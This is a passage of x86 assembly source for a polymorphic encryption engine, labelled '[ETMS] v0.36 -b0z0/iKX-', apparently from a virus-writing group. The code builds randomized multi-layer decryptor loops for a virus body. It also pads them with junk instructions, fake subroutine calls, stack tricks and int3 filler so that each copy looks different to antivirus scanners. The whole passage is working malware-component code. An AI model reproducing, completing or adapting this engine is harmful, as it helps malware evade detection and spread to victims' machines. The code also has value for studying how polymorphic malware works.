xchg eax,ecx ; save key for encryptor
|
||
|
||
call get_random
|
||
and al,1
|
||
jz assign_next ; if so use key
|
||
mov byte ptr [esi+2],20h ; don't use key, just imm
|
||
jmp next_loop
|
||
assign_next:
|
||
; BL register
|
||
; ECX value
|
||
|
||
; either with mov reg, imm or via stack
|
||
call get_random
|
||
shr al,1
|
||
jnc do_withmov
|
||
mov al,068h ; push immediate
|
||
stosb
|
||
xchg eax,ecx
|
||
stosd
|
||
call rnd_garbage
|
||
mov al,bl
|
||
add al,058h ; pop reg32 base
|
||
stosb
|
||
jmp next_loop
|
||
do_withmov:
|
||
mov eax,ebx ; in bl register
|
||
or al,0b8h ; mov base
|
||
stosb
|
||
xchg eax,ecx
|
||
stosd ; the value
|
||
|
||
next_loop:
|
||
mov al,bl
|
||
call set_used ; mark as unusable so far
|
||
|
||
call rnd_garbage
|
||
pop ecx
|
||
loop init_part ; make all init steps
|
||
|
||
|
||
; now some base assignment to a pointer, counter and key (if used) registers
|
||
; has been done. here we are gonna change a bit the various registers where
|
||
; the various things has been assigned
|
||
call get_random_al7
|
||
and al,011b ; from 0 to 3 moves, could be 0-7 ?
|
||
jz decryptor_build_start
|
||
xchg eax,ecx
|
||
reg_movida:
|
||
push ecx
|
||
get_whichone:
|
||
call select_save ; select which to change (pnt,cnt,key)
|
||
jc leave_this_out
|
||
|
||
call save_mov_xchg ; change the regs using mov or xchg
|
||
mov byte ptr [edx],al
|
||
leave_this_out:
|
||
pop ecx
|
||
loop reg_movida
|
||
|
||
decryptor_build_start:
|
||
; decryptor loop begins right here
|
||
|
||
lea esi,[offset t_chgpnt + ebp]
|
||
mov dword ptr [esi - (offset t_chgpnt - offset w_loopbg)],edi
|
||
|
||
call get_random ; select if starting from head or from
|
||
and ax,0101h ; tail and if counter will dec or inc
|
||
mov word ptr [esi - (offset t_chgpnt - offset t_fromend)],ax
|
||
|
||
xchg eax,edx ; rnd in edx
|
||
|
||
shl edx,1 ; add a constant to counter?
|
||
jnc normal_counter
|
||
call get_random
|
||
mov dword ptr [esi - (offset t_chgpnt - offset t_cntoff)],eax
|
||
normal_counter:
|
||
cmp byte ptr [esi - (offset t_chgpnt - offset r_pointer)],05h
|
||
; no bp + off
|
||
je reget_size_op
|
||
|
||
shl edx,1 ; select if use only pointer or
|
||
jc reget_size_op ; pointer + offset
|
||
call get_random ; select random offset
|
||
mov dword ptr [esi - (offset t_chgpnt - offset t_pntoff)],eax
|
||
; if using get offset
|
||
reget_size_op:
|
||
call get_random
|
||
mov edx,eax
|
||
and eax,0fh ; select math operation and size
|
||
or eax,eax ; of operand
|
||
jz reget_size_op
|
||
|
||
; byte word dword
|
||
; ror 1 6 b
|
||
; sub 2 7 c
|
||
; xor 3 8 d
|
||
; add 4 9 e
|
||
; rol 5 a f
|
||
;
|
||
no_rorrrpr:
|
||
cmp byte ptr [esi - (offset t_chgpnt - offset r_regkey)],03
|
||
; if not ax,cx,dx,bx then can't be byte
|
||
jb can_use_all ; as key
|
||
cmp al,6 ; is byte? get another
|
||
jb reget_size_op
|
||
|
||
can_use_all:
|
||
xor ecx,ecx
|
||
mov cl,10 ;9
|
||
cmp byte ptr [esi - (offset t_chgpnt - offset r_regkey)],20h
|
||
je no_keychanges
|
||
|
||
shr edx,8 ; edx has rnd
|
||
and edx,011b
|
||
mov byte ptr [esi - (offset t_chgpnt - offset t_chgkey)],dl
|
||
add ecx,edx ; add nr of key changes
|
||
|
||
no_keychanges:
|
||
cmp al,0bh
|
||
jae ok_counts
|
||
sub ecx,4d ; if with words 4 inc/dec less
|
||
sub word ptr [esi],0202h
|
||
cmp al,06d
|
||
jae ok_counts
|
||
dec ecx ; for bytes even less
|
||
dec ecx
|
||
sub word ptr [esi],0101h
|
||
|
||
ok_counts:
|
||
push eax
|
||
call rnd_garbage
|
||
get_nextseq:
|
||
call get_random_al7
|
||
cmp al,4
|
||
ja get_nextseq
|
||
xchg eax,edx
|
||
cmp byte ptr [esi+edx],0 ; need more ?
|
||
je get_nextseq
|
||
dec byte ptr [esi+edx]
|
||
shl edx,2 ; offset = * 4
|
||
sub edx,(offset t_chgpnt - offset o_table)
|
||
pop eax
|
||
push eax
|
||
push ecx
|
||
push esi
|
||
mov ecx,dword ptr [esi+edx]
|
||
add ecx,ebp
|
||
call ecx ; call the routine to do it
|
||
pop esi
|
||
pop ecx
|
||
pop eax
|
||
loop ok_counts
|
||
|
||
; finished decryption loop, needs just the jump backwards
|
||
call rnd_garbage
|
||
|
||
mov al,0e9h
|
||
stosb
|
||
xor eax,eax
|
||
xchg eax,dword ptr [esi - (offset t_chgpnt - offset w_loopbg)]
|
||
; the jump back to start of
|
||
sub eax,04h ; the decryptor and enable
|
||
sub eax,edi ; overwriting on loop :)
|
||
stosd
|
||
|
||
call rnd_garbage
|
||
call rnd_garbage
|
||
|
||
lea esi,[offset v_lenght + ebp]
|
||
|
||
push edi ; write the offset of the exit jump
|
||
mov edx,dword ptr [esi - (offset v_lenght - offset t_chkpos)]
|
||
sub edi,edx
|
||
mov dword ptr [edx-4],edi
|
||
pop edi
|
||
|
||
; now decryption loop generation is finished
|
||
mov byte ptr [esi - (offset v_lenght - offset r_used)],10h
|
||
; can use all regs (except ESP) again
|
||
|
||
call rnd_garbage ; unencrypted one, some more here
|
||
call rnd_garbage
|
||
|
||
push edi
|
||
call rnd_garbage ; encrypted garbage
|
||
pop ecx
|
||
neg ecx
|
||
add ecx,edi ; how much encrypted garbage
|
||
|
||
mov edx,ecx
|
||
sub edi,edx
|
||
|
||
add ecx,dword ptr [esi]
|
||
|
||
shr ecx,2 ; so it will be enough for b/w/d enc
|
||
inc ecx
|
||
shl ecx,2
|
||
|
||
movzx eax,byte ptr [esi - (offset v_lenght - offset t_prejmp)]
|
||
add ecx,eax ; decs before cmp, so we reach equality
|
||
|
||
pop eax
|
||
neg eax
|
||
add eax,edi ; lenght of decryptor
|
||
|
||
add eax,edx ; total displacement for this layer
|
||
push eax ; so we can correct mem refs
|
||
sub eax,edx
|
||
|
||
add eax,dword ptr [esi - (offset v_lenght - offset v_runnin)]
|
||
; running offset
|
||
|
||
push esi
|
||
add esi,dword ptr [esi - (offset v_lenght - offset layer_nr)]
|
||
mov ebx,dword ptr [esi - (offset v_lenght - offset enc_space) + 12]
|
||
pop esi
|
||
cmp byte ptr [esi - (offset v_lenght - offset t_fromend)],00h
|
||
pushf
|
||
je no_adding
|
||
add eax,ecx ; from end
|
||
no_adding:
|
||
sub eax,dword ptr [esi - (offset v_lenght - offset t_pntoff)]
|
||
; - pointer offset if is there
|
||
mov dword ptr [ebx+1],eax ; set initial pointer
|
||
|
||
mov ebx,dword ptr [esi - (offset v_lenght - offset w_counter)]
|
||
inc ebx
|
||
|
||
mov eax,dword ptr [esi - (offset v_lenght - offset t_cntoff)]
|
||
add eax,ecx
|
||
mov dword ptr [ebx],eax
|
||
|
||
cmp byte ptr [esi - (offset v_lenght - offset t_countback)],01h
|
||
je not_negcnt
|
||
neg dword ptr [ebx]
|
||
|
||
not_negcnt:
|
||
|
||
mov ebx,edi ; pointer on code to encrypt
|
||
add edi,edx ; + encrypted garbage
|
||
popf
|
||
je no_adding2
|
||
add ebx,ecx ; add lenght if from end
|
||
|
||
no_adding2:
|
||
|
||
; save layer data (cnt and pnt) in its entry
|
||
push esi
|
||
add esi,dword ptr [esi - (offset v_lenght - offset layer_nr)]
|
||
mov dword ptr [esi - (offset v_lenght - offset enc_space) +4],ecx
|
||
mov dword ptr [esi - (offset v_lenght - offset enc_space) +8],ebx
|
||
pop esi
|
||
|
||
push esi
|
||
mov esi,dword ptr [esi - (offset v_lenght - offset v_virusp)]
|
||
push ecx
|
||
sub ecx,edx
|
||
rep movsb ; copy what to encrypt
|
||
pop edx
|
||
pop esi
|
||
|
||
pop eax ; this layer lenght to sum
|
||
|
||
mov ecx,dword ptr [esi - (offset v_lenght - offset layer_nr)]
|
||
|
||
corr_addr:
|
||
cmp ecx,tl_space ; correct the adresses of the lower layers
|
||
je corr_end
|
||
add ecx,l_space
|
||
|
||
add [esi - (offset v_lenght - offset enc_space) + ecx + 12d],eax
|
||
add [esi - (offset v_lenght - offset enc_space) + ecx + 8d],eax
|
||
|
||
mov ebx,[esi - (offset v_lenght - offset enc_space) + ecx + 12d]
|
||
add dword ptr [ebx + 1],eax ; pointer from decryptor
|
||
jmp corr_addr
|
||
|
||
corr_end:
|
||
mov ecx,dword ptr [esi - (offset v_lenght - offset layer_end)]
|
||
|
||
cmp dword ptr [esi - (offset v_lenght - offset layer_nr)],ecx
|
||
je finished_layers
|
||
|
||
sub dword ptr [esi - (offset v_lenght - offset layer_nr)],l_space
|
||
|
||
pop ecx ; initial EDI
|
||
push ecx
|
||
push ecx
|
||
push ecx
|
||
sub ecx,edi ; calculate new lenght to encrypt
|
||
neg ecx
|
||
pop edi
|
||
|
||
push ecx
|
||
mov esi,dword ptr [esi - (offset v_lenght - offset orig_dx)]
|
||
xchg esi,edi
|
||
mov edx,edi
|
||
push esi
|
||
rep movsb ; copy to temp space and use that one
|
||
pop edi ; as source for next layer
|
||
mov esi,edx
|
||
pop ecx
|
||
jmp start_layer ; construct next encryption layer
|
||
|
||
finished_layers:
|
||
|
||
; now in reverse order
|
||
; create each encryption layer
|
||
mov eax,dword ptr [esi - (offset v_lenght - offset layer_end)]
|
||
sub esi,(offset v_lenght - (offset enc_space + 10h) - tl_space)
|
||
push edi
|
||
enc_nl:
|
||
|
||
mov ecx,enc_max ; the stored regs
|
||
lea edi,[ebp + offset enc_space_final]
|
||
rep movsb
|
||
pusha
|
||
lea edi,[ebp + offset enc_space_final]
|
||
__p2:
|
||
cmp 4 ptr [edi-2], 0FFFFD20Bh
|
||
jz __p1
|
||
inc edi
|
||
jmp __p2
|
||
__p1: mov al, 74h
|
||
stosb
|
||
stosb
|
||
lea eax, [ebp+exit_space_final]
|
||
sub eax, edi
|
||
mov 1 ptr [edi-1], al
|
||
popa
|
||
mov ecx, [esi - enc_max - 16] ; key value
|
||
mov edx, [esi - enc_max - 12] ; counter
|
||
mov ebx, [esi - enc_max - 8] ; pointer
|
||
sub esi, (l_space + enc_max) ; on next layer
|
||
|
||
; layer chunk, most of it will be overwritten by the one in the structure
|
||
|
||
enc_max equ 24h
|
||
; lenghts
|
||
; 6 = max encryption operation
|
||
; 4 = max 4 inc/dec counter
|
||
; 4 = max 4 inc/dec counter
|
||
; 3 * 6 = max 3 * 6 byte key change operations
|
||
; 4 = check on edx + jump short
|
||
|
||
enc_space_final:
|
||
db enc_max dup (90h) ; here the encryptor will be placed
|
||
jmp enc_space_final
|
||
exit_space_final:
|
||
|
||
add eax,l_space ; next layer structure
|
||
cmp eax,(tl_space + l_space); last layer to do?
|
||
jne enc_nl
|
||
|
||
ll_end:
|
||
pop ecx ; the final edi
|
||
pop edi ; calling edi
|
||
sub ecx,edi ; total lenght
|
||
ret ; poly finished
|
||
|
||
; - ETMS return point
|
||
poly_name db '[ETMS] v0.36 -b0z0/iKX-'
|
||
|
||
put_encloop_2:
|
||
push ecx
|
||
xor ecx,ecx
|
||
inc ecx
|
||
inc ecx
|
||
jmp short put_encloop
|
||
put_encloop_1:
|
||
push ecx
|
||
xor ecx,ecx
|
||
inc ecx
|
||
put_encloop:
|
||
; ecx nr of bytes
|
||
push eax
|
||
xchg edi,dword ptr [w_encrypt+ebp] ; in EDI where we are in enc
|
||
; and save dec position
|
||
copy_it:
|
||
stosb
|
||
shr eax,8
|
||
loop copy_it
|
||
xchg dword ptr [w_encrypt+ebp],edi ; save next and restore dec pnt
|
||
pop eax
|
||
pop ecx
|
||
ret
|
||
|
||
o_table:
|
||
o_counter dd offset ch_counter
|
||
o_pointer dd offset ch_pointer
|
||
o_key dd offset ch_key
|
||
o_mate dd offset ch_mate
|
||
o_exitjmp dd offset ch_exitjmp
|
||
|
||
ch_exitjmp: ; compare and exit jump for dec loop
|
||
xor eax,eax
|
||
inc eax
|
||
mov ecx,dword ptr [esi - (offset t_chgpnt - offset t_cntoff)]
|
||
or ecx,ecx
|
||
jnz must_compare ; is + a constant ?
|
||
|
||
get_checker:
|
||
call get_random
|
||
and eax,0fh
|
||
cmp al,09d
|
||
ja get_checker
|
||
must_compare:
|
||
shr al,1
|
||
pushf
|
||
mov ah,byte ptr [eax + offset chk_counter + ebp] ; get comparer
|
||
add ah,byte ptr [esi - (offset t_chgpnt - offset r_counter)]
|
||
mov al,81h
|
||
popf
|
||
jc store_d00
|
||
inc eax
|
||
inc eax
|
||
stosw
|
||
xor al,al
|
||
stosb
|
||
jmp make_jumps
|
||
store_d00:
|
||
stosw
|
||
xchg eax,ecx
|
||
cmp byte ptr [esi - (offset t_chgpnt - offset t_countback)],01h
|
||
je not_negcnt1
|
||
neg eax
|
||
not_negcnt1:
|
||
stosd
|
||
make_jumps:
|
||
mov ax,840fh ; jz long
|
||
stosw
|
||
stosd
|
||
mov dword ptr [esi - (offset t_chgpnt - offset t_chkpos)],edi
|
||
done_cond:
|
||
|
||
xchg edi,dword ptr [esi - (offset t_chgpnt - offset w_encrypt)]
|
||
mov ax,0d20bh
|
||
stosw
|
||
mov al, 0FFh ; BUG were here
|
||
stosb
|
||
stosb
|
||
xchg edi,dword ptr [esi - (offset t_chgpnt - offset w_encrypt)]
|
||
ret
|
||
|
||
ch_counter: ; decrement/increment counter
|
||
cmp byte ptr [esi - (offset t_chgpnt - offset t_exitjmp)],00h
|
||
je no_pntchgndd
|
||
inc byte ptr [esi - (offset t_chgpnt - offset t_prejmp)]
|
||
no_pntchgndd:
|
||
mov ah,byte ptr [esi - (offset t_chgpnt - offset r_counter)]
|
||
mov al,byte ptr [esi - (offset t_chgpnt - offset t_countback)]
|
||
mov cl,0ah ; edx + always dec in encryptor
|
||
jmp mk_incdec
|
||
|
||
ch_pointer: ; increment/decrement pointer
|
||
mov ah,byte ptr [esi - (offset t_chgpnt - offset r_pointer)]
|
||
mov al,byte ptr [esi - (offset t_chgpnt - offset t_fromend)]
|
||
mov cl,03h ; using ebx in encryptor
|
||
; jmp mk_incdec
|
||
|
||
mk_incdec:
|
||
; al = 0 means dec, 1 means inc
|
||
; ah = register to use
|
||
; cl = oring for encryptor
|
||
shl al,3
|
||
or al,40h
|
||
or al,ah
|
||
push eax
|
||
push eax ; will need this one for encryptor
|
||
call get_random_al7 ; how enc/dec stuff ?
|
||
shr al,1
|
||
jnc lbl_hh
|
||
pop eax
|
||
jmp set_enc_id_pre ; do with inc/dec
|
||
lbl_hh:
|
||
shr al,1
|
||
mov al,083h ; common prefix
|
||
stosb
|
||
pop eax
|
||
jc do_with_sub
|
||
; do with add (either +1 or +(-1))
|
||
or ah,0c0h
|
||
and al,8h ; was decrementing ?
|
||
jnz use_minus1
|
||
jmp use_plus1
|
||
|
||
do_with_sub:
|
||
or ah,0e8h
|
||
and al,08h ; was incrementing
|
||
jz use_minus1
|
||
|
||
use_plus1:
|
||
xor al,al ; 01h
|
||
inc al
|
||
jmp set_enc_id_pre2
|
||
use_minus1:
|
||
xor al,al ; 0ffh
|
||
dec al
|
||
set_enc_id_pre2:
|
||
xchg ah,al
|
||
stosb
|
||
xchg ah,al
|
||
set_enc_id_pre:
|
||
stosb
|
||
set_enc_id:
|
||
pop eax
|
||
and al,(NOT 0111b)
|
||
or al,cl
|
||
jmp put_encloop_1 ; put in encryptor and go away
|
||
|
||
ch_key: ; change key register
|
||
cmp byte ptr [esi - (offset t_chgpnt - offset r_regkey)],20h
|
||
je exit_keychange
|
||
get_modifier:
|
||
call get_random_al7
|
||
mov cl,al
|
||
mov ah,byte ptr [eax + offset key_changers + ebp]
|
||
mov al,81h ; add/sub/xor base
|
||
|
||
cmp cl,3
|
||
jb no_rrrr
|
||
mov al,0c1h ; rol/ror base
|
||
|
||
cmp cl,5
|
||
jne no_rrrr
|
||
mov al,0f7h
|
||
|
||
no_rrrr:
|
||
push eax
|
||
reget_ksize:
|
||
call get_random ; select if byte/word/dword
|
||
and al,011b
|
||
jz reget_ksize
|
||
cmp cl,05h ; inc dec just on dw and dd
|
||
jbe isntincdec
|
||
cmp al,01h
|
||
je reget_ksize
|
||
isntincdec:
|
||
cmp byte ptr [esi - (offset t_chgpnt - offset r_regkey)],3
|
||
jbe canall
|
||
cmp al,01b ; byte keychange only for ax,cx,dx,bx
|
||
je reget_ksize
|
||
canall:
|
||
mov ch,al
|
||
mov dl,ah ; random stuff
|
||
pop eax
|
||
cmp ch,01h
|
||
jne no_decbyte
|
||
dec al
|
||
shr dl,1
|
||
jc no_decbyte
|
||
add ah,04h ; work on high byte
|
||
no_decbyte:
|
||
cmp ch,02h
|
||
jne no_wordprefix
|
||
push eax
|
||
mov al,66h
|
||
stosb
|
||
call put_encloop_1
|
||
pop eax
|
||
no_wordprefix:
|
||
cmp cl,06h
|
||
pushf
|
||
jb no_incdecch ; inc/dec has just one byte opcode
|
||
dec edi
|
||
mov al,byte ptr [edi]
|
||
no_incdecch:
|
||
popf
|
||
push eax
|
||
jb no_nopneeded
|
||
mov al,ah
|
||
or al,1 ; ecx key in enc loop
|
||
call put_encloop_1 ; for inc/dec
|
||
jmp short after_store
|
||
no_nopneeded:
|
||
or ah,1 ; key is ECX in enc loop
|
||
call put_encloop_2
|
||
after_store:
|
||
pop eax
|
||
or ah,byte ptr [esi - (offset t_chgpnt - offset r_regkey)]
|
||
stosw
|
||
cmp cl,05 ; inc/dec/not doesn't need any key
|
||
jae exit_keychange
|
||
call get_random
|
||
cmp cl,03
|
||
jae just_one_bk ; ror/rol just one byte key
|
||
cmp ch,01h
|
||
je just_one_bk ; check dimension of key modifier
|
||
stosb
|
||
call put_encloop_1
|
||
shr eax,8h
|
||
cmp ch,02h
|
||
je just_one_bk
|
||
stosw
|
||
call put_encloop_2
|
||
shr eax,10h
|
||
just_one_bk:
|
||
stosb
|
||
call put_encloop_1
|
||
exit_keychange:
|
||
ret
|
||
|
||
ch_mate: ; creates the decryption math operation
|
||
|
||
xor edx,edx
|
||
mov ecx,5h
|
||
type_sel:
|
||
cmp eax,ecx
|
||
jbe ok_regs
|
||
inc edx
|
||
sub eax,ecx
|
||
jmp type_sel ; get type and size.. in EDX size, in EAX type
|
||
; edx = 0 for byte, 1 for word, 2 for dword
|
||
|
||
ok_regs:
|
||
cmp byte ptr [esi - (offset t_chgpnt - offset r_regkey)],20h
|
||
lea esi,[offset _math_imm + ebp]
|
||
je without_key
|
||
add esi,(offset _math_key - offset _math_imm)
|
||
without_key:
|
||
dec eax ; type - 1
|
||
push esi
|
||
push eax
|
||
shl eax,1 ; each type is a word
|
||
add esi,eax
|
||
lodsw ; ax = mathop word
|
||
|
||
cmp dl,1
|
||
jne not_word
|
||
push eax
|
||
mov al,066h
|
||
stosb
|
||
call put_encloop_1
|
||
pop eax
|
||
not_word:
|
||
or dl,dl
|
||
jnz not_byte
|
||
dec al
|
||
not_byte:
|
||
pop ebx ; type - 1
|
||
pop esi ;
|
||
|
||
push ebx
|
||
|
||
push eax
|
||
neg ebx
|
||
add ebx,4 ; get opposite math operation
|
||
shl ebx,1
|
||
add esi,ebx
|
||
lodsw
|
||
|
||
lea esi,[offset r_regkey + ebp]
|
||
cmp byte ptr [esi],20h
|
||
je ok_regskey
|
||
cmp al,0d3h
|
||
je ok_regskey
|
||
add ah,08h ; since ECX is used as key
|
||
ok_regskey:
|
||
or dl,dl
|
||
jnz not_byterev
|
||
dec al
|
||
not_byterev:
|
||
add ah,03h ; in enc loop using EBX
|
||
call put_encloop_2
|
||
pop eax
|
||
|
||
mov cl,byte ptr [esi - (offset r_regkey - offset r_pointer)]
|
||
cmp cl,03h ; eax-ebx
|
||
ja upper_ones
|
||
add ah,cl
|
||
jmp ok_register_p
|
||
upper_ones:
|
||
add ah,06h
|
||
cmp cl,06h ; esi
|
||
je ok_register_p
|
||
inc ah
|
||
cmp cl,07h ; edi
|
||
je ok_register_p
|
||
add ah,03eh ; ebp
|
||
ok_register_p:
|
||
|
||
pop ecx ; type-1
|
||
|
||
cmp dword ptr [esi - (offset r_regkey - offset t_pntoff)],0
|
||
je not_plusoff
|
||
add ah,80h
|
||
not_plusoff:
|
||
stosw
|
||
|
||
xor eax,eax
|
||
|
||
cmp byte ptr [esi],20h ; using key?
|
||
je ok_register_k
|
||
|
||
or cl,cl
|
||
je check_rr
|
||
cmp cl,4
|
||
jne not_rol_ror
|
||
check_rr:
|
||
cmp byte ptr [esi],1 ; is key CX (cl)
|
||
je ok_register_k
|
||
mov al,10h ; if not put just immediate
|
||
sub byte ptr [edi-2],12h
|
||
|
||
mov ebx,dword ptr [esi - (offset r_regkey - offset w_encrypt)]
|
||
sub byte ptr [ebx-2],12h
|
||
|
||
push ecx
|
||
mov bl,20h
|
||
xchg bl,byte ptr [esi] ; won't use key reg anymore in the
|
||
call unset_used ; future, so use for garbage
|
||
pop ecx
|
||
jmp short ok_register_k
|
||
|
||
not_rol_ror:
|
||
mov al,byte ptr [esi]
|
||
shl eax,3 ; * 8
|
||
add byte ptr [edi-1],al ; key register
|
||
|
||
ok_register_k:
|
||
cmp byte ptr [esi - (offset r_regkey - offset r_pointer)],05h
|
||
jne not_usingbp
|
||
mov byte ptr [edi],00h
|
||
inc edi
|
||
not_usingbp:
|
||
|
||
mov eax,dword ptr [esi - (offset r_regkey - offset t_pntoff)]
|
||
or eax,eax
|
||
jz no_offsetadd
|
||
stosd
|
||
no_offsetadd:
|
||
cmp byte ptr [esi],20h
|
||
jne no_key_needed
|
||
|
||
push esi
|
||
add esi,dword ptr [esi - (offset r_regkey - offset layer_nr)]
|
||
mov eax,dword ptr [esi - (offset r_regkey - offset enc_space)]
|
||
pop esi
|
||
or cl,cl
|
||
je byte_key
|
||
cmp cl,4
|
||
je byte_key
|
||
or dl,dl
|
||
je byte_key
|
||
|
||
stosb
|
||
call put_encloop_1
|
||
|
||
shr eax,8
|
||
dec dl
|
||
jz byte_key
|
||
stosw
|
||
call put_encloop_2
|
||
shr eax,10h
|
||
byte_key:
|
||
stosb
|
||
call put_encloop_1
|
||
|
||
no_key_needed:
|
||
ret
|
||
|
||
rnd_garbage:
|
||
push ecx
|
||
push eax
|
||
call get_random
|
||
and eax,0fh ; max - 1
|
||
inc eax ; not zero
|
||
xchg eax,ecx
|
||
|
||
garbager:
|
||
; ecx how many
|
||
push edx
|
||
push ebx
|
||
garbager_loop:
|
||
push ecx
|
||
get_op_type:
|
||
call get_random ; how many possible types
|
||
and eax,garbage_mask
|
||
cmp eax,garbage_number
|
||
ja get_op_type
|
||
|
||
mov ecx,[(eax*4)+offset garbage_offsets+ebp]
|
||
add ecx,ebp
|
||
call ecx ; call garbage routine
|
||
pop ecx
|
||
loop garbager_loop
|
||
|
||
mov eax,dword ptr [t_pushed+ebp]
|
||
|
||
cmp eax,000005h ; if not in a call, not in a jump and
|
||
ja stack_is_ok ; pushed <=5
|
||
|
||
or eax,eax
|
||
jz stack_is_ok
|
||
|
||
inc byte ptr [t_inacall+ebp]
|
||
|
||
cmp al,01h
|
||
ja direct_addesp
|
||
call do_pop_nocheck
|
||
jmp stack_is_ok
|
||
|
||
direct_addesp:
|
||
push eax ; then correct stack
|
||
mov ax,0c483h ; add esp,nr_dd * 4
|
||
stosw
|
||
pop eax
|
||
call force_popall
|
||
stack_is_ok:
|
||
pop ebx
|
||
pop edx
|
||
|
||
pop eax
|
||
pop ecx
|
||
ret
|
||
|
||
do_push:
|
||
cmp byte ptr [t_pushed+ebp],05h ; max dwords on the stack
|
||
ja exit_pusher
|
||
inc byte ptr [t_pushed+ebp]
|
||
call get_random ; 4 types of pushing
|
||
and al,011b
|
||
jz push_register ; normal push reg
|
||
dec al
|
||
jz push_immediate_dd ; push immediate double
|
||
dec al
|
||
jz push_immediate_by ; push immediate byte
|
||
|
||
mov ax,35ffh ; push immediate from memory
|
||
stosw
|
||
call get_address
|
||
jmp pre_exit_dd
|
||
|
||
push_immediate_by:
|
||
mov al,6ah
|
||
stosb
|
||
shr ah,1
|
||
jc zero_or_menouno
|
||
bswap eax
|
||
jmp pre_exit_pusher
|
||
|
||
zero_or_menouno: ; very usual pushes
|
||
xchg ah,al
|
||
and al,01b ; so we will get 0 or -1
|
||
dec al ; to LARGE 0 or to LARGE -1
|
||
jmp pre_exit_pusher
|
||
|
||
push_immediate_dd:
|
||
mov al,68h
|
||
stosb
|
||
call get_random
|
||
pre_exit_dd:
|
||
stosd ; normal push as double
|
||
jmp exit_pusher
|
||
|
||
push_register:
|
||
call get_random_al7
|
||
add al,050h
|
||
pre_exit_pusher:
|
||
stosb
|
||
exit_pusher:
|
||
jmp exit_ppc
|
||
|
||
do_pop:
|
||
cmp byte ptr [t_pushed+ebp],00h
|
||
je return_nopop
|
||
do_pop_nocheck:
|
||
call get_random
|
||
shr al,1
|
||
jnc popintoreg2
|
||
mov ax,0c483h ; add esp,
|
||
stosw
|
||
get_number:
|
||
call get_random_al7
|
||
jz get_number
|
||
cmp al,byte ptr [t_pushed+ebp]
|
||
ja get_number
|
||
force_popall:
|
||
sub byte ptr [t_pushed+ebp],al
|
||
shl al,2 ; dd are pushed, so * 4
|
||
jmp store_ngo2
|
||
popintoreg2:
|
||
call get_register
|
||
add cl,058h ; pop in a register
|
||
xchg eax,ecx
|
||
dec byte ptr [t_pushed+ebp]
|
||
store_ngo2:
|
||
stosb
|
||
return_nopop:
|
||
jmp exit_ppc
|
||
|
||
call_subroutines:
|
||
cmp word ptr [t_maxjmps+ebp],0h ; don't nest too much nor
|
||
jne just_exit_call ; put pushes/pops in subs and
|
||
; we can't know wassup in
|
||
; conditional jumps and such
|
||
|
||
inc byte ptr [t_inacall+ebp]
|
||
|
||
call get_random_al7
|
||
cmp al,01h ; 00h and 01h push
|
||
jbe do_push
|
||
cmp al,05 ; 02h - 05h pops (more probable so final stack
|
||
jbe do_pop ; correction should be needed less often)
|
||
|
||
; 06,07 do a call
|
||
mov al,0e8h
|
||
stosb
|
||
stosd ; place for offset
|
||
|
||
push edi
|
||
call rnd_garbage
|
||
pop ebx
|
||
|
||
mov al,0e9h
|
||
stosb
|
||
stosd ; jump offset
|
||
push edi
|
||
call krappo_gen ; random bytes
|
||
call rnd_garbage
|
||
|
||
push ebx
|
||
neg ebx
|
||
add ebx,edi
|
||
xchg eax,ebx
|
||
pop ebx
|
||
|
||
mov dword ptr [ebx-4],eax ; call offset
|
||
|
||
call rnd_garbage ; this is the called "subroutine"
|
||
|
||
call get_random ; more ways of getting back from subroutine,
|
||
shr al,1 ; either with normal ret or by correcting the
|
||
jnc normal_ret ; stack by popping or by adding to esp
|
||
shr al,1
|
||
jnc popintoreg
|
||
mov ax,0c483h ; add esp,
|
||
stosw
|
||
mov al,4
|
||
jmp store_ngo
|
||
popintoreg:
|
||
call get_register
|
||
add cl,058h ; pop base
|
||
xchg eax,ecx
|
||
jmp store_ngo
|
||
normal_ret:
|
||
mov al,0c3h ; ret
|
||
stosb
|
||
bswap eax ; some random
|
||
and eax,07h
|
||
cmp al,4
|
||
jb do_the_int3s
|
||
jne no_ccs
|
||
random_crap:
|
||
call krappo_gen
|
||
jmp no_ccs
|
||
do_the_int3s:
|
||
xchg eax,ecx
|
||
mov al,0cch ; int3, usual after subroutines in win32s
|
||
rep stosb
|
||
store_ngo:
|
||
stosb
|
||
no_ccs:
|
||
call rnd_garbage
|
||
|
||
pop ebx ; jump offset
|
||
|
||
push ebx
|
||
neg ebx
|
||
add ebx,edi
|
||
xchg eax,ebx
|
||
pop ebx
|
||
|
||
mov dword ptr [ebx-4],eax
|
||
exit_ppc:
|
||
dec byte ptr [t_inacall+ebp]
|
||
just_exit_call:
|
||
ret
|
||
|
||
maths_immediate_short:
|
||
stc
|
||
jmp maths_immediate_1
|
||
|
||
maths_immediate:
|
||
clc
|
||
maths_immediate_1:
|
||
pushf
|
||
call get_random ; (0 to 7) * 8
|
||
and al,0111000b
|
||
add al,0c0h ; the base
|
||
popf
|
||
push eax
|
||
pushf
|
||
call get_register
|
||
add al,cl
|
||
mov ah,81h ; prefix
|
||
popf
|
||
pushf
|
||
jnc not_a_shortone
|
||
inc ah
|
||
inc ah
|
||
not_a_shortone:
|
||
xchg ah,al
|
||
stosw
|
||
call g_dimension
|
||
popf
|
||
jnc not_a_shortone2
|
||
mov cl,01h
|
||
not_a_shortone2:
|
||
call put_immediates
|
||
pop eax
|
||
cmp al,0f8h ; is a CMP
|
||
jne not_compare
|
||
make_jmp_after_cmp:
|
||
call get_random
|
||
and eax,01b ; long or short jump
|
||
add al,06h ; short jump
|
||
jmp make_jump
|
||
not_compare:
|
||
ret
|
||
|
||
cdq_jmps_savestack:
|
||
call get_random_al7
|
||
sub al,3
|
||
jc exit_c_j_ss
|
||
xchg eax,ecx
|
||
mov al,byte ptr [ecx+offset change_jump+ebp]
|
||
cmp cl,1
|
||
ja not_cdq_cbw
|
||
|
||
test byte ptr [r_used+ebp],0101b ; EAX and EDX for cbw,cwd,cdq,cwde
|
||
jnz exit_c_j_ss
|
||
stosb
|
||
inc edi
|
||
call g_dimension
|
||
dec edi
|
||
jmp exit_c_j_ss
|
||
not_cdq_cbw:
|
||
cmp cl,4
|
||
je pushandmov
|
||
add cl,4 ; this is used for dimension
|
||
jmp do_that_fjump ; do as for conditional ones
|
||
pushandmov:
|
||
|
||
call select_save
|
||
jc exit_c_j_ss
|
||
|
||
xchg eax,ebx
|
||
mov al,50h ; push
|
||
|
||
xor ch,ch ; so it won't be erased from stack
|
||
xchg ch,byte ptr [t_pushed+ebp]
|
||
|
||
push ecx
|
||
call unset_used ; mark that as unused one
|
||
add al,bl ; push the reg
|
||
stosb
|
||
call rnd_garbage
|
||
add al,08h ; pop opcode
|
||
stosb
|
||
|
||
pop ebx
|
||
mov byte ptr [t_pushed+ebp],bh
|
||
